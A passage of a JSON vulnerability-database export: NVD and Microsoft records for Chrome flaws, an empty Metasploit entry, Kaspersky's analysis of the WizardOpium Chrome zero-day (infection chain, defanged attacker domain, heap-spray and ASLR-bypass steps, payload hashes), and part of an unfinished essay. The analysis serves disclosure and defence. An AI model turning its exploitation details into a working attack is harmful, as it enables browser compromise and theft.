"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21163"], "modified": "2021-04-07T12:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21163", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21163", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-08T13:40:59", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "title": "CVE-2021-21161", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21161"], "modified": "2021-04-07T12:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21161", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-08T13:40:59", "description": "Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "title": "CVE-2021-21160", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21160"], "modified": "2021-04-07T12:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21160", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": 
["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-08T13:40:59", "description": "Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "title": "CVE-2021-21162", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21162"], "modified": "2021-04-07T12:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21162", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21162", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-08T13:40:59", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "title": "CVE-2021-21159", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159"], "modified": "2021-04-07T12:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21159", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-08T13:40:59", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "title": "CVE-2021-21166", "type": "cve", "cwe": 
["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-04-07T12:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21166", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:12:50", "description": "Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "edition": 17, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-25T15:15:00", "title": "CVE-2019-13720", "type": "cve", "cwe": ["CWE-416", "CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2019-13720", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13720", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "mscve": [{"lastseen": "2021-03-18T19:14:17", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-21160"], "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "modified": "2021-03-04T20:03:56", "id": "MS:CVE-2021-21160", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21160", "published": "2021-03-04T20:03:56", "type": "mscve", "title": "Chromium CVE-2021-21160: Heap buffer overflow in WebAudio", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T19:14:16", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-21161"], "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "modified": "2021-03-04T20:03:57", "id": "MS:CVE-2021-21161", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21161", "published": "2021-03-04T20:03:57", "type": "mscve", "title": "Chromium CVE-2021-21161: Heap buffer overflow in TabStrip", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T19:14:16", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-21162"], "description": "This CVE was assigned by Chrome. 
Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "modified": "2021-03-04T20:03:58", "id": "MS:CVE-2021-21162", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21162", "published": "2021-03-04T20:03:58", "type": "mscve", "title": "Chromium CVE-2021-21162: Use after free in WebRTC", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T19:14:17", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-21159"], "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "modified": "2021-03-04T20:03:55", "id": "MS:CVE-2021-21159", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21159", "published": "2021-03-04T20:03:55", "type": "mscve", "title": "Chromium CVE-2021-21159: Heap buffer overflow in TabStrip", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T19:14:16", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-21163"], "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. 
Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "modified": "2021-03-04T20:03:59", "published": "2021-03-04T20:03:59", "id": "MS:CVE-2021-21163", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21163", "type": "mscve", "title": "Chromium CVE-2021-21163: Insufficient data validation in Reader Mode", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-03-18T19:14:16", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-21166"], "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n\n**This CVE has been reported to be exploited in the wild.**\n", "modified": "2021-03-04T20:04:01", "id": "MS:CVE-2021-21166", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21166", "published": "2021-03-04T20:04:01", "type": "mscve", "title": "Chromium CVE-2021-21166: Object lifecycle issue in audio", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T19:14:16", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-21164"], "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. 
Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "modified": "2021-03-04T20:03:59", "published": "2021-03-04T20:03:59", "id": "MS:CVE-2021-21164", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21164", "type": "mscve", "title": "Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2021-04-07T22:49:34", "description": "\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "FreeBSD: VID-F00B65D8-7CCB-11EB-B3BE-E09467587C17 (CVE-2021-21159): chromium -- multiple vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "1976-01-01T00:00:00", "id": "MSF:ILITIES/FREEBSD-CVE-2021-21159/", "href": "", "sourceData": "", "sourceHref": "", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "securelist": [{"lastseen": "2019-11-27T10:39:00", "bulletinFamily": "blog", "cvelist": ["CVE-2019-13720"], "description": "\n\n## Executive summary\n\nKaspersky Exploit Prevention is a component part of Kaspersky products that has successfully detected a number of zero-day attacks in the past. Recently, it caught a new unknown exploit for Google's Chrome browser. We promptly reported this to the Google Chrome security team. 
After reviewing the PoC we provided, Google confirmed there was a zero-day vulnerability and assigned it CVE-2019-13720. Google has released Chrome version 78.0.3904.87 for Windows, Mac, and Linux and we recommend that all Chrome users update to this latest version as soon as possible! You can read Google's bulletin by [clicking here](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>).\n\nKaspersky endpoint products detect the exploit with the help of the exploit prevention component. The verdict for this attack is Exploit.Win32.Generic.\n\nWe are calling these attacks Operation WizardOpium. So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) attacks that have recently deployed similar false flag attacks.\n\nMore details about CVE-2019-13720 and recent DarkHotel false flag attacks are available to customers of Kaspersky Intelligence Reporting. For more information, contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## Technical details\n\nThe attack leverages a waterhole-style injection on a Korean-language news portal. Malicious JavaScript code was inserted in the main page, which in turn loads a profiling script from a remote site.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122729/WizardOpium_CVE-2019-13720_01.png>)\n\n_Redirect to the exploit landing page_\n\nThe main index page hosted a small JavaScript tag that loaded a remote script from hxxp://code.jquery.cdn.behindcorona[.]com/. \n\nThe script then loads another script named _.charlie.XXXXXXXX.js_. 
This JavaScript checks if the victim's system can be infected by performing a comparison with the browser's user agent, which should run on a _64-bit_ version of _Windows_ and not be a _WOW64_ process; it also tries to get the browser's name and version. The exploit targets a bug in the _Google Chrome_ browser, and the script checks that the version is greater than or equal to 65 (current Chrome version is 78):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122743/WizardOpium_CVE-2019-13720_02.png>)\n\n_Chrome version checks in the profiling script (.charlie.XXXXXXXX.js)_\n\nIf the browser version checks out, the script starts performing a number of AJAX requests to the attacker-controlled server (_behindcorona[.]com_) where a path name points to the argument that is passed to the script (_xxxxxxx.php_). The first request is necessary to obtain some important information for further use. This information includes several hex-encoded strings that tell the script how many chunks of the actual exploit code should be downloaded from the server, as well as a URL to the image file that embeds a key for the final payload and the RC4 key to decrypt these chunks of the exploit's code.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122755/WizardOpium_CVE-2019-13720_03.png>)\n\n_Exploitation chain - AJAX requests to xxxxxxx.php_\n\nAfter downloading all the chunks, the script RC4-decrypts and concatenates all the parts, which gives the attacker a new JavaScript code containing the full browser exploit. To decrypt the parts, the previously retrieved RC4 key is used.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122805/WizardOpium_CVE-2019-13720_04.png>)\n\n_One more version check_\n\nThe browser exploit script is obfuscated; after de-obfuscation we observed a few peculiar things:\n\n 1. 
Another check is made against the user agent's string - this time it checks that the browser version is 76 or 77. It could mean that the exploit authors have only worked on these versions (a previous exploitation stage checked for version number 65 or newer) or that other exploits have been used in the past for older Chrome versions. \n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122818/WizardOpium_CVE-2019-13720_05.png>)\n\n_Obfuscated exploit code_\n\n 2. There are a few functions that operate on the browser's built-in _BigInt_ class, which is useful for doing 64-bit arithmetic inside JavaScript code, for example, to work with native pointers in a 64-bit environment. Usually, exploit developers implement their own functions for doing this by working with 32-bit numbers. However, in this case, _BigInt_ is used, which should be faster because it's implemented natively in the browser's code. The exploit developers don't use all 64 bits here, but instead operate on a smaller range of numbers. This is why they implement a few functions to work with the higher/lower parts of the number. \n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122829/WizardOpium_CVE-2019-13720_06.png>)\n\n_Snippet of code to work with 64-bit numbers_\n\n 3. There are many functions and variables that are not used in the actual code. This usually means that they were used for debugging code and were then left behind when the code was moved to production.\n 4. The majority of the code uses several classes related to a certain vulnerable component of the browser. As this bug has still not been fixed, we are not including details about the specific vulnerable component here.\n 5. There are a few big arrays with numbers that represent a shellcode block and an embedded PE image.\n\nThe analysis we have provided here is deliberately brief due to vulnerability disclosure principles. 
The exploit used a _race condition_ bug between two threads due to _missing proper synchronization_ between them. It gives an attacker a _Use-After-Free (UaF)_ condition that is very dangerous because it can lead to code execution scenarios, which is exactly what happens in our case.\n\nThe exploit first tries to trigger the _UaF_ to perform an information leak of important 64-bit addresses (pointers). This results in a few things: 1) if an address is leaked successfully, it means the exploit is working correctly; 2) a leaked address is used to know where the heap/stack is located, and that defeats the _address space layout randomization (ASLR)_ technique; 3) a few other useful pointers for further exploitation could be located by searching near this address. \n\nAfter that, it tries to create a number of large objects using a recursive function. This is done to create a deterministic heap layout, which is important for successful exploitation. At the same time, it attempts to utilize a heap spraying technique that aims to reuse the same pointer that was freed earlier in the UaF part. This trick could be used to cause confusion and give the attacker the ability to operate on two different objects (from a JavaScript code perspective), though in reality they are located in the same memory region.\n\nThe exploit attempts to perform numerous operations to allocate/free memory along with other techniques that eventually give the attackers an arbitrary read/write primitive. 
This is used to craft a special object that can be used with _WebAssembly_ and _FileReader_ together to perform code execution for the embedded shellcode payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122845/WizardOpium_CVE-2019-13720_07.png>)\n\n_First stage shellcode_\n\n## Payload description\n\nThe final payload is downloaded as an encrypted binary (worst.jpg) that is decrypted by the shellcode.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122905/WizardOpium_CVE-2019-13720_08.png>)\n\n_Encrypted payload - worst.jpg_\n\nAfter decryption, the malware module is dropped as updata.exe to disk and executed. For persistence the malware installs tasks in Windows Task Scheduler. \n\nThe payload 'installer' is a RAR SFX archive, with the following information:\n\nFile size: 293,403 \nMD5: 8f3cd9299b2f241daf1f5057ba0b9054 \nSHA256: 35373d07c2e408838812ff210aa28d90e97e38f2d0132a86085b0d54256cc1cd\n\nThe archive contains two files:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01152326/WizardOpium_CVE-2019-13720_code.png>)\n\nFile name: iohelper.exe \nMD5: 27e941683d09a7405a9e806cc7d156c9 \nSHA256: 8fb2558765cf648305493e1dfea7a2b26f4fc8f44ff72c95e9165a904a9a6a48 \n\nFile name: msdisp64.exe \nMD5: f614909fbd57ece81d00b01958338ec2 \nSHA256: cafe8f704095b1f5e0a885f75b1b41a7395a1c62fd893ef44348f9702b3a0deb \n\nBoth files were compiled at the same time, which if we are to believe the timestamp, was \"Tue Oct 8 01:49:31 2019\". \nThe main module (msdisp64.exe) tries to download the next stage from a hardcoded C2 server set. The next stages are located on the C2 server in folders with the victim computer names, so the threat actors have information about which machines were infected and place the next stage modules in specific folders on the C2 server. \n\nMore details about this attack are available to customers of Kaspersky Intelligence Reporting. 
For more information, contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>). \n\n## IoCs\n", "modified": "2019-11-01T16:00:12", "published": "2019-11-01T16:00:12", "id": "SECURELIST:B3F6FE1E8EA0830B8B1306E79A2E63EA", "href": "https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/", "type": "securelist", "title": "Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-07T10:20:58", "bulletinFamily": "blog", "cvelist": ["CVE-1999-0001", "CVE-2019-13720"], "description": "\n\nDespite our continuous research efforts to detect cyberattacks and enable defense, we often feel that we, as members of a global community, are failing to achieve an adequate level of cybersecurity.\n\nThis is threatening the proper development and use of information technologies and digital assets, and as a consequence, most of society's current and future activities, from entertainment to democratic processes, including business, healthcare and industrial production.\n\nWe believe that such a failure can be explained by a lack of global willpower, double-dealing activities, and the lack of global regulations. Here, we develop these hypotheses and outline ideas to advance cybersecurity.\n\n## What we do, and how it is failing\n\nKaspersky's Global Research and Analysis Team ([GReAT](<https://www.kaspersky.com/about/team>)) is made up of cybersecurity researchers. 
Our shared capabilities and expertise stem from multifaceted individual experiences and perspectives that can always be traced back to strong technical backgrounds. Each and every day, our skills are focused on clear goals: to anticipate, discover, detect, track and report cyberattacks. But our activities and findings are, first and foremost, a contribution to a broader mission: to build a safer world. Since our inception more than a decade ago, we have worked very hard \u2013 from [awareness raising](<https://bestinau.com.au/kasperskys-greats-david-emm-and-david-jacoby-the-importance-of-cyber-security/>) and [media interviews](<https://arstechnica.com/information-technology/2020/08/chinese-hackers-have-pillaged-taiwans-semiconductor-industry/>) to [embedded firmware reverse engineering](<https://securelist.com/hacking-microcontroller-firmware-through-a-usb/89919/>), as well as [incident-response support](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>), [vulnerabilities research](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>), [malicious infrastructure hunting](<https://securelist.com/the-roof-is-on-fire-tackling-flames-cc-servers/33033/>), code similarity [heuristics development](<https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool>), discovery of major threat actors or [advanced malicious frameworks](<https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/>), [open-sourced tools](<https://securelist.com/your-new-friend-klara/85046/>), [specialized training](<https://xtraining.kaspersky.com/>) and expert talks at [world-class conferences](<https://thesascon.com/>). As far as our expertise is concerned, we believe that we provide beneficial results to our customers, partners and the global community. 
We know from previous collaboration and published content that our colleagues at government bodies, other cybersecurity providers and private companies work just as hard and achieve tremendous results as well.\n\nYet, somehow, we are still failing. Cyberattack numbers, whatever their impact, from digital activities to unwanted or disastrous effects, [keep skyrocketing](<https://securelist.com/all/?category=437>) every year. Cybercrime has never been [so prevalent](<https://www.forbes.com/sites/daveywinder/2020/02/13/the-fbi-issues-a-powerful-35-billion-cybercrime-warning/>) and [real](<https://www.rt.com/uk/495293-cybercrime-on-rise-23-percent/>), reaching every possible device, from [IoT](<https://securelist.com/iot-a-malware-story/94451/>) to [supercomputers](<https://securelist.com/apt-trends-report-q2-2020/97937/>), as well as [network routers](<https://securelist.com/new-wave-of-mirai-attacking-home-routers/76791/>), [smartphones](<https://securelist.com/it-threat-evolution-q1-2020-statistics/96959/>) and [personal computers](<https://securelist.com/bots-and-botnets-in-2018/90091/>). 
Cyberattacks have become a go-to companion, wherever there is malicious intent to [tackle competition](<https://citizenlab.ca/2020/06/dark-basin-uncovering-a-massive-hack-for-hire-operation/>), [hijack accounts](<https://securelist.com/who-viewed-you-instagram-account-and-who-stole-your-password/74260/>), [spy on a partner](<https://securelist.com/monitorminor-vicious-stalkerware/95575/>), [persecute a minority](<https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/>), [disrupt critical infrastructure](<https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/>), [influence electoral processes](<https://www.intelligence.senate.gov/sites/default/files/documents/report_volume5.pdf>), [steal knowledge](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>) or [obtain money](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>). Cyber-based conflicts keep escalating, to the point where there is now a trend around the globe to proclaim that cyberwar capabilities [are being developed](<https://www.nasdaq.com/articles/so-who-has-most-advanced-cyber-warfare-technology-2017-10-19>), and kinetic force could be used as a response to cyberattacks whenever [deemed fit](<https://fas.org/irp/eprint/dod-cyber.pdf>). And [ransomware](<https://home.kpmg/xx/en/home/insights/2020/05/rise-of-ransomware-during-covid-19.html>) or [state-sponsored cyberattacks](<https://www.ncsc.gov.uk/news/covid-19-exploited-by-cyber-actors-advisory>) keep hitting hard even as we are all confronted with a pandemic.\n\n## Our hypotheses and beliefs\n\nWhy does all that outstanding technical effort, an abundance of cybersecurity solutions, highly skilled workforces, and decades of awareness raising fail to tackle cyberthreats? 
